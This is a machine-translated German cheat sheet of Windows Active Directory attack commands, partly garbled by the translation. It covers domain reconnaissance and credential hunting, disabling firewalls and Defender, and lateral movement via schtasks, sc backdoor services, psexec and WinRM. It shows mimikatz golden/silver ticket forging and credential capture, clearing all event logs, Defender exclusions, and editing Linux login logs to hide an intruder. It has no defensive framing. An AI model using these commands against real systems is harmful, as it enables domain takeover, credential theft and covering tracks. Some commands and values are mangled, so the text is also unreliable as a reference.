Nettozeit/Domain Netzgruppe „Domänenadministratoren“ /Domäne Netzgruppe „Domänencontroller“ /Domäne Netzbenutzeradministrator /Domäne nltest /domain_trusts Domänenvertrauensbeziehung abrufen nltest /dclist: Nettoanteil net view \\domainip net view /domain Domänen-/Arbeitsgruppenliste anzeigen net view /domain:secwing Zeigt die Liste der Computer in der Secwing-Domäne an net config Workstation fragt ab, zu welcher Domäne die Maschine gehört netstat -ano |findstr Net-Konten Lokale Passwortrichtlinie anzeigen

nbtstat – Eine IP-Netbiso-Abfrage whoami /alle qwinsta //Anmeldestatus anzeigen query user //Zeigen Sie die letzte Anmeldezeit des Administrators an nltest /domain_trusts //Informationen zur Domänenvertrauensstellung abrufen taskkill /f /im tasklist /svc Prozesse anzeigen tasklist /S ip /U domain\username /P /V //Zeigen Sie die Prozessliste des Remote-Computers an Tracert IP //Routenverfolgung route print //Routing-Tabelle drucken arp -a //Alle aktiven IP-Adressen in diesem Netzwerksegment auflisten arp -s (ip MAC) //Mac und IP-Adresse binden arp -d (ip MAC) // Mac- und IP-Adressen entbinden reg-Abfrage „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default“ /ve Erhalten Sie aktuelle mstsc-Anmeldedatensätze setspn -Q \*/\* SPN-Liste

findstr /si Passwort *.txt findstr /si Passwort *.xml findstr /si Passwort *.ini

dir /b /s unattend.xml dir /b /s web.config dir /b /s sysprep.inf

Netsh-Firewall set opmode mode=disable netsh advfirewall hat den Status „allprofiles“ deaktiviert

Netzstopp Windefend

Netsh-Firewall zurücksetzen

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Stellen Sie eine Netznutzungsverbindung her net use \\192.168.1.100\c$ 1qaz@WSX /user domain\user Bat-Datei auf den Remote-Computer kopieren Kopieren Sie exec.bat \\192.168.1.100\c$\windows\debug\exec.bat Zeigen Sie die Zeit des Remote-Computers an Nettozeit \\192.168.1.100 Erstellen Sie eine neue remote geplante Aufgabe unter \\192.168.1.100 21.52 c:\windows\temp\exec.bat Sehen Sie sich die Liste der remote geplanten Aufgaben an bei \\192.168.1.100

Aufgabe erstellen schtasks /create /s ip /u Administrator /password /ru "system" /tn adduser(name) /sc DAILY(time) /tr c:\windows\debug\add.bat /f Aufgaben ausführen schtasks /run /s ip /u Administrator /p Passwort /tn adduser /i schtasks /run /tn update /$ 10.10.10.137 /u test \administrator /p 1qaz@WSX Aufgabe löschen schtasks /delete /s ip /u Administrator /p Passwort /tn adduser /f

Stellen Sie eine IPC-Verbindung her und führen Sie SC aus net use \\192.168.17.138\c$ "admin123" /user:pt007 Nettoverbrauch dir \\192.168.17.138\c$ kopieren Sie test.exe \\192.168.17.138\c$ Dienst erstellen sc \\remote_ip create services_name binpath= c:\backdoor.exe sc \\10.10.10.10 update erstellen binpath= c:\programdata\a.bat Dienst starten sc \\remote_ip Startdienstname sc \\10.10.10.10 Update starten Außer Betrieb sc \\remote_ip stop service_name sc \\10.10.10.10 Update stoppen Dienst löschen sc \\remote_ip Dienstname löschen sc \\10.10.10.10 Update löschen

netsh firewall show config //Firewall-Richtlinie anzeigen Netsh Firewall Show State // Firewall-Richtlinie anzeigen Aktivieren Sie die Portweiterleitung netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport Firewall öffnen netsh advfirewall firewall add Rule name="firewallname" Protocol=TCP dir=in localip=ip localport=port action=allow Alle Weiterleitungsregeln anzeigen Netsh-Schnittstelle Portproxy Alle anzeigen Weiterleitung löschen netsh interface portproxy delete v4tov4 listenport=port listenaddress=ip zurücksetzen Netsh-Schnittstelle Portproxy zurückgesetzt

1.SSH-Forward-Port-Weiterleitung ssh -L [<lokaler Host>:] <lokaler Port>:<Remote-Host>:<Remote-Port><SSH-Hostname> 2.SSH-Reverse-Port-Weiterleitung ssh -R [<lokaler Host>:]<lokaler Port>:<Remote-Host>:<Remote-Port><SSH-Hostname> 3.SSH-Socken-Proxy ssh -D [<lokaler Host>:] <lokaler Port><ssh-Hostname>

Bedingungen und Anforderungen für goldene Banknoten: 1.Domainname 2. SID-Wert der Domäne whoami /user 3. NTLM-Passwort-Hash des Krbtgt-Kontos der Domäne 4. Gefälschter Benutzername sekurlsa::pth /user:administrator /domain:"GOD.org" /ntlm:61465a991b168727b65b3644aab823cd NTLM-Verschlüsselungswert der Domänenadresse des Anmeldebenutzers Hier wird ein CMD-Feld angezeigt. Überprüfen Sie zunächst mithilfe von dir \\OWA.GOD.org\c$ [Domänensteuerung C-Laufwerk anzeigen], ob wir die entsprechende Berechtigung haben. dir \\\\DC.zkaq.cn\c$ lsadump::dcsync /user:krbtgt /domain: Holen Sie sich das Passwort von krbtgt [mimikatz simuliert die Domänenkontrolle und fordert die Konto- und Passwortinformationen von der Zieldomänenkontrolle an] Extrahieren Sie Sid und HashNTLM darin Kerberos :: GOLDEN /Admin: Administrator /domain:god.org /sign: S-1-5-21-2952760202-13539024381784089 /KRBTGT: 58e91a5886513AB2224312314000 61 /ticket:Administrator.kiribi [Produktionsrechnungen] kerberos::pttadministrator.kiribi [Ticket laden] Direkteinspritzung von Goldnoten kerveros::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:domainsid /krbtgt:hash /ptt kerberos::purge löscht Tickets Privileg::Debug Warten Sie, bis sich der Administrator angemeldet hat, um das Passwort zu erhalten mimikatz #privilege::debug Privileg '20' OK mimikatz # misc::memssp Gespritzt =) mimikatz #exit

Aktuelle Benutzerseite anzeigen whoami /user Holen Sie sich den Hash des Zielcomputers sekurlsa::logonpasswords 1472 Sicherheitslücke Silbernoten generieren kerberos::golden /sid:domainsid /domain:test.local /ptt /id: gefälschte Benutzer-ID /target:mdc.test.local /service:cifs /rc: Zielcomputer-Hash /user: gefälschter Benutzername

dsquery.exe user -limit 0#Benutzerobjektinformationen abfragen dsquery.exe group -limit 0 #Gruppenobjektinformationen abfragen dsquery.exe oder -limit 0#Informationen zum OU-Objekt abfragen dsquery user domainroot -limit 65535 && net user /domain //Alle Benutzernamen in der Domäne auflisten dsquery server -domain supre.com |. dsget server -dnsname -site //Suchen Sie nach allen Domänencontrollern in der Domäne und zeigen Sie deren DNS-Hostnamen und Site-Namen an dsquery contact //Kontakte im Verzeichnis finden dsquery subnet //Listen Sie die Netzwerksegmentbereiche in dieser Domäne auf dsquery group && net group /domain //Listen Sie die Gruppen in dieser Domäne auf dsquery ou //Organisationseinheiten in dieser Domäne auflisten dsquery server && net time /domain //Domänencontroller in dieser Domäne auflisten dsquery site -o rdn //Suche nach allen Site-Namen in der Domäne dsquery-Gruppe dc=GOD,dc=org |more Alle Gruppen in der Domäne dc=god, dc=org durchsuchen dsquery.exe Computer #Suchen Sie den Computer im Ziel dsquery.exe-Site #Finden Sie Organisationseinheiten im Verzeichnis dsquery.exe-Server #Suchen Sie die AD DC/LDS-Instanz im Verzeichnis

AdFind -sc dclist #Domain-Controller-Namen auflisten AdFind -sc computer_active #Fragen Sie die Online-Computer in der aktuellen Domäne ab AdFind -sc Computer_aktiver Name OperatingSystem #Fragen Sie die Online-Computer in der aktuellen Domäne ab (nur Anzeigename und Betriebssystem) AdFind.exe -sc computer_aktiver Name dnshostname #Fragen Sie die aktiven Hosts in der Domäne ab und geben Sie den Hostnamen und den Domänennamen aus AdFind -f "objectcategory=computer" #Alle Computer in der aktuellen Domäne abfragen AdFind -f "objectcategory=computer" name OperatingSystem #Alle Computer in der aktuellen Domäne abfragen (nur der Name und das Betriebssystem werden angezeigt) AdFind -users name #Fragen Sie alle Benutzer in der Domain ab AdFind -sc gpodmp #Alle Gruppenrichtlinienobjekte abfragen AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* #Fragen Sie die detaillierten Informationen aller Benutzer in der Domäne ab AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test #Spezifische Benutzerdetails in der Domäne abfragen AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test mail #Spezifische benutzerspezifische Informationen (Mail) in der Domäne abfragen AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -dn #Fragen Sie die DNS-Informationen aller Benutzer in der Domäne ab AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -c #Fragen Sie die Anzahl der Benutzer in der Domäne ab AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:* #Fragen Sie die detaillierten Informationen aller Gruppen in der Domäne ab AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*Admin #Fragen Sie die detaillierten Informationen aller Gruppen in der Domäne ab, deren Gruppenname Admin enthält AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc o:* #Alle OU-Details in der Domäne abfragen AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc c:* #Fragen Sie die detaillierten Informationen aller Computer in der Domäne ab AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc s:* #Fragen Sie die detaillierten Informationen aller Websites in der Domain ab

psexec.exe -accepteula \\10.10.10.137 -u test\administrator -p 1qaz@WSX -i cmd.exe psexec.exe -accepteula -i -s -d cmd paexec.exe \\ip -u domain\user -p pwd cmd.exe -noname net use \\ip pwd /u:domain\user paexec.exe \\ip cmd.exe netsh winhttp sh Proxy-Proxy anzeigen

winrm quickconfig -q winrm s winrm/config/Client @{TrustedHosts="*"} Port-80-Überwachung hinzugefügt winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} Ändern Sie 5985 in 80 winrm set winrm/config/Listener?Address=* Transprot=HTTP @{port=80} Ändern Sie den WinRM-Port in einen Web-Port winrs -r:http://xx -u:DC20\administrator -p:1qaz@WSX cmd

Belastung Imoport-Modul .\PowerView.ps1 #Abfrage ausführen Get-DomainGroup #Gruppendetails abfragen Get-DomainOU #Fragen Sie die detaillierten Informationen der OU ab Get-DomainUser #Benutzerdetails abfragen

psloggedon.exe-Benutzername -l zeigt nur lokal angemeldete Benutzer an und zeigt keine anderen im Netzwerk angemeldeten Benutzer an -x zeigt die Anmeldezeit nicht an Zeigt an, dass der aktuell am Remote-Computer angemeldete Benutzer Folgendes eingeben kann: psloggedon \\Remote-Maschinen-IP Fügen Sie -accepteula zum ersten Mal hinzu, um keine Copyright-Informationen anzuzeigen.

netsess.exe \\PRIMARY

PVEFindADUser.exe -current

wevtutil epl Security C:\log.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] und System[(EventID=4624) und TimeCreated[timediff(@SystemTime) <= 259200000 ]]]" /r:Remote-Computer-IP /u:Benutzername/p:Passwort #epl-Exportprotokoll #Sicherheit bedeutet Sicherheitsprotokoll #C:\log.evtx stellt den Speicherort des exportierten Protokolls dar. Bei einem Remote-Export wird es auf den Remote-Computer exportiert. #/q: stellt die Protokollabfrageanweisung dar #System[(EventID=4624) stellt die Zeit-ID von 4624 dar, die das Protokoll der erfolgreichen Benutzeranmeldung ist #EventData[Data[@Name='LogonType']='3'] bedeutet, dass der Anmeldetyp Netzwerkanmeldung ist #TimeCreated[timediff(@System Time) <= 259200000] bedeutet, dass nur die Protokolle des letzten Monats exportiert werden. Die Einheit von 259200000 ist Millisekunden. Sie können die Zahlengröße entsprechend den tatsächlichen Anforderungen ändern. #Wenn Sie lokal exportieren, müssen Sie die Option /r nicht angeben. Weitere Informationen zur Verwendung von #wevtutil finden Sie in der zugehörigen Hilfedokumentation, die zum Löschen von Windows-Protokollen verwendet werden kann.

LogParser.exe -i:EVT -o csv "SELECT eindeutig TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) als USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) als SOURCE_IP FROM C:\*. evtx" > C:\log.csv # -i:EVT bedeutet, dass das Protokolleingabeformat evtx ist # -o csv bedeutet, dass das Ausgabeformat csv ist # Der Inhalt in doppelten Anführungszeichen ist die Abfrageanweisung # eindeutig bedeutet, dass die Ergebnisse dedupliziert werden # TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME Analysieren Sie den Protokollnamen aus dem Anmeldeprotokoll # USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) Analysieren Sie die Anmeldequelle aus dem Anmeldeprotokoll # *.evtx kann mehrere Protokolldateien gleichzeitig verarbeiten # Sie können die Details des Anmeldeprotokolls mit dem folgenden Befehl anzeigen LogParser.exe -i:EVT -o:DATAGRID „wähle * aus *.evtx“

wevtutil el listet die Namen aller Protokolle im System auf wevtutil cl system löscht Systemprotokolle Die wevtutil cl-Anwendung bereinigt Anwendungsprotokolle wevtutil cl security löscht Sicherheitsprotokolle for /f "delims=" %j in('wevtutil.exe el') do @wevtutil.exe cl "%j" c:\windows\system32\winevt\logs\

„C:\PROGRA~1\WINDOW~1\mpcmdrun.exe“ -Restore -ListAll Powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" Powershell -Command Add-MpPreference -ExclusionExtension".java" Powershell -Command Add-MpPreference -ExclusionProcess "*.exe" Powershell-Befehl Get-MpPreference

/var/log/btmp zeichnet alle Informationen zu Anmeldefehlern auf. Verwenden Sie zum Anzeigen den Befehl lastb /var/log/lastlog zeichnet das letzte Anmeldezeitprotokoll aller Benutzer im System auf. Verwenden Sie den Befehl lastlog, um es anzuzeigen. /var/log/wtmp zeichnet die Anmelde- und Abmeldeinformationen aller Benutzer auf. Verwenden Sie zum Anzeigen den letzten Befehl /var/log/utmp zeichnet die aktuell angemeldeten Benutzerinformationen auf. Verwenden Sie zum Anzeigen w, who, Benutzer und andere Befehle /var/log/secure zeichnet sicherheitsrelevante Protokollinformationen auf /var/log/message zeichnet Informationen und Fehlerprotokolle nach dem Systemstart auf Der letzte Anmeldedatensatz, der beim Anmelden bei ssh angezeigt wird letzte Anmeldezeit von der IP Aufgezeichnet in der Datei /var/log/lastlog ~/.ssh/known_hosts Sie können sed zum Ersetzen verwenden sed -i 's/own ip/original ip' /var/log/lastlog sed -i '/Heutiges Datum/'d Dateiname Melden Sie sich unsichtbar beim System an und werden von w, who, last und anderen Befehlen nicht erkannt ssh -T root@192.168.01 /bin/bash -i